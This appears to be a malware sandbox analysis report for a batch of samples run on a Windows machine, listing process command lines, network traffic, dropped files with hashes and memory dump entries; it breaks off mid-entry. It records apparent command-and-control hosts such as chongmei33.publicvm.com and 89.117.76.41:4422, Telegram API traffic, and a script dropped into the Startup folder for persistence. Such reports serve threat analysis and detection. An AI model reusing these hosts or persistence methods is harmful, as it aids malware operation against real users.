"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4892.0.1728769490\1348298946" -parentBuildID 20221007134813 -prefsHandle 1784 -prefMapHandle 1776 -prefsLen 20938 -prefMapSize 232675 -appDir "C:\Program Files\Mozilla Firefox\browser" - {63b6619b-8869-4c1c-b544-288163fb025b} 4892 "\\.\pipe\gecko-crash-server-pipe.4892" 1944 1c2bfbd7c58 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4892.1.1884509601\1799933842" -parentBuildID 20221007134813 -prefsHandle 2376 -prefMapHandle 2372 -prefsLen 20974 -prefMapSize 232675 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b20167a8-cc63-47aa-89e5-91e8544779f1} 4892 "\\.\pipe\gecko-crash-server-pipe.4892" 2412 1c2bf6e2258 socket

Network

Country Destination Domain Proto
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 126.133.255.8.in-addr.arpa udp
US 8.8.8.8:53 4.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 2.77.109.52.in-addr.arpa udp
US 8.8.8.8:53 grapemundo.com udp
IN 103.50.163.157:443 grapemundo.com tcp
US 8.8.8.8:53 157.163.50.103.in-addr.arpa udp
US 8.8.8.8:53 142.33.222.23.in-addr.arpa udp
US 8.8.8.8:53 129.252.72.23.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 chongmei33.publicvm.com udp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 122.144.47.103.in-addr.arpa udp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
US 8.8.8.8:53 gstatic-node.io udp
US 188.114.97.0:80 gstatic-node.io tcp
US 8.8.8.8:53 0.97.114.188.in-addr.arpa udp
US 188.114.97.0:80 gstatic-node.io tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
US 8.8.8.8:53 12.173.189.20.in-addr.arpa udp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 233.134.159.162.in-addr.arpa udp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
US 8.8.8.8:53 9.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 api.ipify.org udp
US 104.237.62.211:443 api.ipify.org tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
US 8.8.8.8:53 211.62.237.104.in-addr.arpa udp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
US 8.8.8.8:53 checkip.dyndns.org udp
US 8.8.8.8:53 onedrive.live.com udp
US 158.101.44.242:80 checkip.dyndns.org tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
US 13.107.42.13:443 onedrive.live.com tcp
US 8.8.8.8:53 y1qk5g.dm.files.1drv.com udp
US 8.8.8.8:53 13.42.107.13.in-addr.arpa udp
US 8.8.8.8:53 242.44.101.158.in-addr.arpa udp
US 13.107.42.12:443 y1qk5g.dm.files.1drv.com tcp
US 8.8.8.8:53 12.42.107.13.in-addr.arpa udp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
US 8.8.8.8:53 www.rainbow-industrie.com udp
FR 178.32.90.242:2550 www.rainbow-industrie.com tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
US 8.8.8.8:53 242.90.32.178.in-addr.arpa udp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp
US 104.237.62.211:443 api.ipify.org tcp
US 8.8.8.8:53 50.33.237.178.in-addr.arpa udp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
US 104.237.62.211:443 api.ipify.org tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
US 89.117.76.41:4422 tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
US 89.117.76.41:4422 tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
US 8.8.8.8:53 uploaddeimagens.com.br udp
US 188.114.96.0:443 uploaddeimagens.com.br tcp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
US 8.8.8.8:53 chongmei33.publicvm.com udp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
US 89.117.76.41:4422 tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
US 8.8.8.8:53 checkip.dyndns.org udp
US 158.101.44.242:80 checkip.dyndns.org tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
US 89.117.76.41:4422 tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
US 89.117.76.41:4422 tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
US 89.117.76.41:4422 tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
US 89.117.76.41:4422 tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 chongmei33.publicvm.com udp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
N/A 224.0.0.251:5353 udp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
US 89.117.76.41:4422 tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 52.168.117.173:443 nw-umwatson.events.data.microsoft.com tcp
US 8.8.8.8:53 173.117.168.52.in-addr.arpa udp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
US 89.117.76.41:4422 tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
US 89.117.76.41:4422 tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
US 89.117.76.41:4422 tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
US 8.8.8.8:53 chongmei33.publicvm.com udp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
US 89.117.76.41:4422 tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
US 89.117.76.41:4422 tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
US 89.117.76.41:4422 tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:7045 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp
SG 103.47.144.122:49746 chongmei33.publicvm.com tcp

Files

memory/1712-343-0x00007FFF417B0000-0x00007FFF417C0000-memory.dmp

memory/1712-345-0x00007FFF81730000-0x00007FFF81925000-memory.dmp

memory/1712-344-0x00007FFF417B0000-0x00007FFF417C0000-memory.dmp

memory/1712-347-0x00007FFF81730000-0x00007FFF81925000-memory.dmp

memory/1712-346-0x00007FFF417B0000-0x00007FFF417C0000-memory.dmp

memory/1712-348-0x00007FFF417B0000-0x00007FFF417C0000-memory.dmp

memory/1712-349-0x00007FFF81730000-0x00007FFF81925000-memory.dmp

memory/1712-350-0x00007FFF417B0000-0x00007FFF417C0000-memory.dmp

memory/1712-351-0x00007FFF81730000-0x00007FFF81925000-memory.dmp

memory/1712-352-0x00007FFF81730000-0x00007FFF81925000-memory.dmp

memory/1712-353-0x00007FFF81730000-0x00007FFF81925000-memory.dmp

memory/1712-354-0x00007FFF81730000-0x00007FFF81925000-memory.dmp

memory/1712-355-0x00007FFF81730000-0x00007FFF81925000-memory.dmp

memory/1712-356-0x00007FFF3EF40000-0x00007FFF3EF50000-memory.dmp

memory/1712-357-0x00007FFF81730000-0x00007FFF81925000-memory.dmp

memory/1712-358-0x00007FFF81730000-0x00007FFF81925000-memory.dmp

memory/1712-359-0x00007FFF81730000-0x00007FFF81925000-memory.dmp

memory/1712-360-0x00007FFF81730000-0x00007FFF81925000-memory.dmp

memory/1712-361-0x00007FFF81730000-0x00007FFF81925000-memory.dmp

memory/1712-362-0x00007FFF81730000-0x00007FFF81925000-memory.dmp

memory/1712-363-0x00007FFF3EF40000-0x00007FFF3EF50000-memory.dmp

C:\Users\Admin\Desktop\2023-08-17-18\0bc5ba29090a537426e9f198bc924a23403155a2dcb848a58280f6205f4fd6c1.xls

MD5 dcaec797dfb93816d1feac477c300d5c
SHA1 597e6bc9dcf65338704937865f0755a9869f9cb7
SHA256 0bc5ba29090a537426e9f198bc924a23403155a2dcb848a58280f6205f4fd6c1
SHA512 59b996e37339e4f4b7726897328cb5e64012409bbafa2a4de42513d43b5fb11d6fe11569e1d67fb29d08a7c47731ca0686a403b7126c02b7a8cefcedf9f613d0

C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

MD5 bca3d4d518a06072977c41ea814a2311
SHA1 75516f0730abd2b15b7a970f18a5246064b8bee9
SHA256 9cc6a254dcee27af8848cbefdd392d44d04437d2c8b9cebb76175a68ea53c09a
SHA512 00640d5eb4b508f723007968354b54edc44b3bdc1088ae20f84544bab6e0631bdd07fad6e172172100c267fb687991f04ca8e85e6cf1480c2a67a96fa1d20a46

memory/1712-381-0x00007FFF81730000-0x00007FFF81925000-memory.dmp

memory/1712-382-0x00007FFF81730000-0x00007FFF81925000-memory.dmp

memory/1712-386-0x00007FFF81730000-0x00007FFF81925000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\424402D6.emf

MD5 d69c22a341e111feea69df6d8c655d60
SHA1 ac862337f2efa43627508927f5052ce694012206
SHA256 05b2053bf1d070d6034b45cd79b54d80da3c6d88d016671a345e75048b1a68db
SHA512 d4db33ed046b3c9ba09c4b3feac17b1fe2e75fce67f4154fd795d504708c295a1e3c8331ed3d6c3ee9950c936c4cc25b5d690558c26f2e1f7771bd5eb275822c

memory/1712-414-0x00007FFF417B0000-0x00007FFF417C0000-memory.dmp

memory/1712-415-0x00007FFF417B0000-0x00007FFF417C0000-memory.dmp

memory/1712-416-0x00007FFF417B0000-0x00007FFF417C0000-memory.dmp

memory/1712-417-0x00007FFF417B0000-0x00007FFF417C0000-memory.dmp

memory/1712-418-0x00007FFF81730000-0x00007FFF81925000-memory.dmp

C:\Users\Admin\Desktop\2023-08-17-18\0cdcc03848c1c403215a2e8445c3918f893ee145d4ea5b175d62bf47de0dfb35.exe

MD5 f6bf7f27897a06a9d811732cd9b608e1
SHA1 296735e8d8ebc474eba089c62f71189fe1d00bd0
SHA256 0cdcc03848c1c403215a2e8445c3918f893ee145d4ea5b175d62bf47de0dfb35
SHA512 94790415406989c9e9cf31e104f6fff2c0ba37ce110ba3496ae0e12fb6a4cb5accfa202ba5c40a0cb2153449647086a251393fb4ae35701a07be388c5a57e7f6

C:\Users\Admin\Desktop\2023-08-17-18\0cdcc03848c1c403215a2e8445c3918f893ee145d4ea5b175d62bf47de0dfb35.exe

MD5 f6bf7f27897a06a9d811732cd9b608e1
SHA1 296735e8d8ebc474eba089c62f71189fe1d00bd0
SHA256 0cdcc03848c1c403215a2e8445c3918f893ee145d4ea5b175d62bf47de0dfb35
SHA512 94790415406989c9e9cf31e104f6fff2c0ba37ce110ba3496ae0e12fb6a4cb5accfa202ba5c40a0cb2153449647086a251393fb4ae35701a07be388c5a57e7f6

C:\comRuntimeCrtdll\reJQeYd4I.vbe

MD5 1a8884c5e14f4476a570017d2310f0ff
SHA1 f59490edeba91d4b2577510620efa8f74832623d
SHA256 0f903634014fca7fce912192778138a5978ba372f5b47ca9837d193d1df20569
SHA512 6e08ed4b5048a2e55fc2ec9e584a38238c68c714d45b983b13087ea41832f7622692a482c634caa36f175fcf8bca47f4770a0a8bb40c3f763a50730cf109e1b3

C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe

MD5 a9a44220f7819f03d7b8474033b169ee
SHA1 0f0bf5382702736838907fd65e5dd7e50616f305
SHA256 1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa
SHA512 255bc358ad925873d382461ad5000f9f55d96c10751a5c682882cee61e363dbbbba2eb405c91ab3ae12df343e84ce9bf04f0e866846317e5ac5288e9d9eb549b

C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe

MD5 a9a44220f7819f03d7b8474033b169ee
SHA1 0f0bf5382702736838907fd65e5dd7e50616f305
SHA256 1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa
SHA512 255bc358ad925873d382461ad5000f9f55d96c10751a5c682882cee61e363dbbbba2eb405c91ab3ae12df343e84ce9bf04f0e866846317e5ac5288e9d9eb549b

memory/4104-431-0x0000000074580000-0x0000000074D30000-memory.dmp

memory/4104-432-0x0000000000A00000-0x0000000000AAC000-memory.dmp

memory/4104-433-0x00000000059E0000-0x0000000005F84000-memory.dmp

memory/4104-434-0x00000000054D0000-0x0000000005562000-memory.dmp

memory/4104-435-0x0000000005670000-0x0000000005680000-memory.dmp

memory/4104-436-0x00000000054A0000-0x00000000054AA000-memory.dmp

C:\comRuntimeCrtdll\1yEJ1LJx7Aonc2gKvRqS.bat

MD5 f3faff1507515775a00a540d1989063a
SHA1 936c953cdebf9c746b62569a81d6945ea5b9a737
SHA256 a7333a41c732765892eabd63e8535e53af7fcb7f46a57d901d7031deb1d398c9
SHA512 e0f9d15f6fd825df538b201f24580b2988b9ce6665c1c45f31288f6c53bdea2791b9b179e265a387e05b2f52131a7f6e264426f9067cfd47ed03591d03fe6d53

C:\comRuntimeCrtdll\agentbrowser.exe

MD5 9a84688aca96d89b149e213f6d059bfb
SHA1 043c929249d1dcbdddf4cfd278be4425f25bb644
SHA256 f8ee97725f7f1cdf37b5899e287c8497293e76ab372ee22bd9922ba3624e1b52
SHA512 c623def7e6276f72993e52c0ad603dbaaabbe85c4856c09c4a03f7180d333f16f5c159722c511e8ae8ccdc9a5d65d1d553b8686f13fdb9f336aaf41b39ef84b5

C:\comRuntimeCrtdll\agentbrowser.exe

MD5 9a84688aca96d89b149e213f6d059bfb
SHA1 043c929249d1dcbdddf4cfd278be4425f25bb644
SHA256 f8ee97725f7f1cdf37b5899e287c8497293e76ab372ee22bd9922ba3624e1b52
SHA512 c623def7e6276f72993e52c0ad603dbaaabbe85c4856c09c4a03f7180d333f16f5c159722c511e8ae8ccdc9a5d65d1d553b8686f13fdb9f336aaf41b39ef84b5

C:\comRuntimeCrtdll\agentbrowser.exe

MD5 9a84688aca96d89b149e213f6d059bfb
SHA1 043c929249d1dcbdddf4cfd278be4425f25bb644
SHA256 f8ee97725f7f1cdf37b5899e287c8497293e76ab372ee22bd9922ba3624e1b52
SHA512 c623def7e6276f72993e52c0ad603dbaaabbe85c4856c09c4a03f7180d333f16f5c159722c511e8ae8ccdc9a5d65d1d553b8686f13fdb9f336aaf41b39ef84b5

memory/548-441-0x0000000000F70000-0x0000000001064000-memory.dmp

memory/548-442-0x00007FFF61830000-0x00007FFF622F1000-memory.dmp

memory/548-443-0x000000001BDF0000-0x000000001BE00000-memory.dmp

memory/548-445-0x00007FFF61830000-0x00007FFF622F1000-memory.dmp

C:\Users\Admin\Desktop\2023-08-17-18\4e8d2ed372068535d420927ad0f59dd34eda4f33f7bafcec6b694379b8948487.jar

MD5 f6fc54801fabf0bbb663f40d31aa3955
SHA1 7b1fa7f8554baf92409dec2a1f5a54a00ed30054
SHA256 4e8d2ed372068535d420927ad0f59dd34eda4f33f7bafcec6b694379b8948487
SHA512 610253b6f631e528e39c2675b5b8e002217e5a0553f47af07dffc2eb742d6759e13804a7c16ee62a7b12b0f0865c1a521682fce6a2abfbbc0849f55bcce631e9

memory/4420-449-0x00000000032A0000-0x00000000042A0000-memory.dmp

memory/4420-458-0x00000000016B0000-0x00000000016B1000-memory.dmp

memory/4104-459-0x0000000074580000-0x0000000074D30000-memory.dmp

C:\Users\Admin\Desktop\2023-08-17-18\7a57c3bcbdfc2482505bcf4c20885c1288635f780667a5cf4c7f0804251dd719.js

MD5 71223537f79596646a8938dd2346b649
SHA1 e0746a857f5aa62fff78070bd3b97db2ddfe559a
SHA256 7a57c3bcbdfc2482505bcf4c20885c1288635f780667a5cf4c7f0804251dd719
SHA512 a6850d1eed527874e8b93aa29fa76df11faa7147392db4bb8acf255f4cef028ebfddec329c8f8d0c2e3010f0f0b05b650558108583ae28a0913a849c6dff33ab

memory/4104-463-0x0000000005670000-0x0000000005680000-memory.dmp

memory/4420-474-0x00000000032A0000-0x00000000042A0000-memory.dmp

memory/4420-476-0x00000000016B0000-0x00000000016B1000-memory.dmp

memory/4420-478-0x0000000003530000-0x0000000003540000-memory.dmp

memory/4420-479-0x0000000003520000-0x0000000003530000-memory.dmp

memory/4420-480-0x0000000003540000-0x0000000003550000-memory.dmp

memory/4420-481-0x0000000003550000-0x0000000003560000-memory.dmp

memory/4420-482-0x00000000032A0000-0x00000000042A0000-memory.dmp

C:\Users\Admin\Desktop\2023-08-17-18\9c60202f8f982a2cd9c02450186b611e472ea1f842e6ba6bdaa7eddcf8f254e5.exe

MD5 5f0afcc8f35d3fbed1a678425a96dcb4
SHA1 6ee14626979ce91ff37c4035e23473a0420f36e1
SHA256 9c60202f8f982a2cd9c02450186b611e472ea1f842e6ba6bdaa7eddcf8f254e5
SHA512 75704f2cde36ee1c48a2addaab7bfa52cbe66e45f54838c04179975f248e0397930508455a3f91abd872917e5c13baa0ea8e014b40b62d1e7b5605b83ed1a0d8

C:\Users\Admin\Desktop\2023-08-17-18\9c60202f8f982a2cd9c02450186b611e472ea1f842e6ba6bdaa7eddcf8f254e5.exe

MD5 5f0afcc8f35d3fbed1a678425a96dcb4
SHA1 6ee14626979ce91ff37c4035e23473a0420f36e1
SHA256 9c60202f8f982a2cd9c02450186b611e472ea1f842e6ba6bdaa7eddcf8f254e5
SHA512 75704f2cde36ee1c48a2addaab7bfa52cbe66e45f54838c04179975f248e0397930508455a3f91abd872917e5c13baa0ea8e014b40b62d1e7b5605b83ed1a0d8

memory/2944-496-0x0000000000400000-0x000000000052E000-memory.dmp

memory/2944-497-0x0000000074580000-0x0000000074D30000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TGDEJN.vbs

MD5 57ce47f3c71f44a6e1270ba954ab3a9a
SHA1 c01261f70f0b2ef9e39b9e2a5bf75743760967d4
SHA256 2379541bc38b9a61637cee49eb60d902b1af5e27bfa4f7885218308d1024cab4
SHA512 85a0b87a248ab50e678b49e622eb1311e2df2fae4a99dea318edde735bcff17e5724dbc71341c70aa62766e1f5f1e8f139ff583f84bf7d3ff5f6bd85002fa264

memory/2944-498-0x00000000050A0000-0x00000000050B0000-memory.dmp

memory/2944-501-0x00000000064D0000-0x0000000006594000-memory.dmp

C:\Users\Admin\Desktop\2023-08-17-18\7bf46bf16be075a6c263a2e12339a9a01c96d933eb61b474002144bf7c7cc73b.exe

MD5 254f2b0822d915db93df95571ab74093
SHA1 25da96864584dea6e5376857baac56dddd52b254
SHA256 7bf46bf16be075a6c263a2e12339a9a01c96d933eb61b474002144bf7c7cc73b
SHA512 ab78be667aca55163ca9fc44ef077047d1ce45c8a86f45cfc4da1303177cee2902cf9c51d0a4d5f8decba7ab8759bb32ddb72579798d1dec0b60086fa622d4f9

C:\Users\Admin\Desktop\2023-08-17-18\7bf46bf16be075a6c263a2e12339a9a01c96d933eb61b474002144bf7c7cc73b.exe

MD5 254f2b0822d915db93df95571ab74093
SHA1 25da96864584dea6e5376857baac56dddd52b254
SHA256 7bf46bf16be075a6c263a2e12339a9a01c96d933eb61b474002144bf7c7cc73b
SHA512 ab78be667aca55163ca9fc44ef077047d1ce45c8a86f45cfc4da1303177cee2902cf9c51d0a4d5f8decba7ab8759bb32ddb72579798d1dec0b60086fa622d4f9

memory/2944-504-0x00000000064D0000-0x0000000006594000-memory.dmp

memory/2672-507-0x00000000004C0000-0x0000000000578000-memory.dmp

memory/2672-506-0x0000000074580000-0x0000000074D30000-memory.dmp

memory/2944-508-0x00000000064D0000-0x0000000006594000-memory.dmp

memory/2944-499-0x00000000064D0000-0x0000000006594000-memory.dmp

memory/2944-510-0x00000000064D0000-0x0000000006594000-memory.dmp

memory/2944-513-0x00000000064D0000-0x0000000006594000-memory.dmp

memory/2944-515-0x00000000064D0000-0x0000000006594000-memory.dmp

memory/2672-512-0x0000000004FC0000-0x0000000004FD0000-memory.dmp

memory/2944-517-0x00000000064D0000-0x0000000006594000-memory.dmp

memory/2944-519-0x00000000064D0000-0x0000000006594000-memory.dmp

memory/2944-521-0x00000000064D0000-0x0000000006594000-memory.dmp

memory/2944-523-0x00000000064D0000-0x0000000006594000-memory.dmp

memory/2944-525-0x00000000064D0000-0x0000000006594000-memory.dmp

C:\Users\Admin\Desktop\2023-08-17-18\5dc3015899fea24b6c7b9099fc5e153a69395b4208a249cf9ab2ff9b26d7ae99.exe

MD5 3843399a36f9d39da02586a0603a9f23
SHA1 d34937bf8c1c34f6f0f18ce9c52ce847f03a2fd4
SHA256 5dc3015899fea24b6c7b9099fc5e153a69395b4208a249cf9ab2ff9b26d7ae99
SHA512 707a61512a21fc7cdf74252fc3dbfb271abd941d51c35e1442dce569fb1d48b9ba01068d3917749a9730c57c48bfa59b3f3885f3485b522f0da81af5b66b0c87

C:\Users\Admin\Desktop\2023-08-17-18\5dc3015899fea24b6c7b9099fc5e153a69395b4208a249cf9ab2ff9b26d7ae99.exe

MD5 3843399a36f9d39da02586a0603a9f23
SHA1 d34937bf8c1c34f6f0f18ce9c52ce847f03a2fd4
SHA256 5dc3015899fea24b6c7b9099fc5e153a69395b4208a249cf9ab2ff9b26d7ae99
SHA512 707a61512a21fc7cdf74252fc3dbfb271abd941d51c35e1442dce569fb1d48b9ba01068d3917749a9730c57c48bfa59b3f3885f3485b522f0da81af5b66b0c87

memory/2944-528-0x00000000064D0000-0x0000000006594000-memory.dmp

memory/2944-531-0x00000000064D0000-0x0000000006594000-memory.dmp

memory/1356-533-0x0000000000EA0000-0x0000000000F56000-memory.dmp

memory/1356-535-0x0000000074580000-0x0000000074D30000-memory.dmp

memory/2944-534-0x00000000064D0000-0x0000000006594000-memory.dmp

memory/2944-537-0x00000000064D0000-0x0000000006594000-memory.dmp

memory/2944-539-0x00000000064D0000-0x0000000006594000-memory.dmp

memory/2944-541-0x00000000064D0000-0x0000000006594000-memory.dmp

memory/1356-543-0x0000000005AC0000-0x0000000005B5C000-memory.dmp

memory/1356-547-0x0000000005A10000-0x0000000005A20000-memory.dmp

memory/4420-545-0x00000000032A0000-0x00000000042A0000-memory.dmp

memory/2944-544-0x00000000064D0000-0x0000000006594000-memory.dmp

memory/2944-548-0x00000000064D0000-0x0000000006594000-memory.dmp

C:\Users\Admin\Desktop\2023-08-17-18\6d0fee7a64435cda0b8ac5652c5a19e9e284514bec8110ae7c02341dcc3e1277.exe

MD5 e6b8cfb15c6fce9abcea7a716345d537
SHA1 c56b60c650439c124b403e31aced45c584ecdd7b
SHA256 6d0fee7a64435cda0b8ac5652c5a19e9e284514bec8110ae7c02341dcc3e1277
SHA512 e0163f07a996590e04340b61c3facbc2b5030936028f2ae6bb648b57fadaf2a74d2e8aea29a6eb1b6ff33058feb878f5003609b4bba018c7312c5762f1c84cc1

C:\Users\Admin\Desktop\2023-08-17-18\6d0fee7a64435cda0b8ac5652c5a19e9e284514bec8110ae7c02341dcc3e1277.exe

MD5 e6b8cfb15c6fce9abcea7a716345d537
SHA1 c56b60c650439c124b403e31aced45c584ecdd7b
SHA256 6d0fee7a64435cda0b8ac5652c5a19e9e284514bec8110ae7c02341dcc3e1277
SHA512 e0163f07a996590e04340b61c3facbc2b5030936028f2ae6bb648b57fadaf2a74d2e8aea29a6eb1b6ff33058feb878f5003609b4bba018c7312c5762f1c84cc1

memory/2772-555-0x00000000000A0000-0x00000000001F4000-memory.dmp

memory/2944-554-0x00000000064D0000-0x0000000006594000-memory.dmp

memory/2944-558-0x00000000064D0000-0x0000000006594000-memory.dmp

memory/2944-560-0x00000000064D0000-0x0000000006594000-memory.dmp

memory/2772-556-0x0000000074580000-0x0000000074D30000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TGDEJN.vbs

MD5 57ce47f3c71f44a6e1270ba954ab3a9a
SHA1 c01261f70f0b2ef9e39b9e2a5bf75743760967d4
SHA256 2379541bc38b9a61637cee49eb60d902b1af5e27bfa4f7885218308d1024cab4
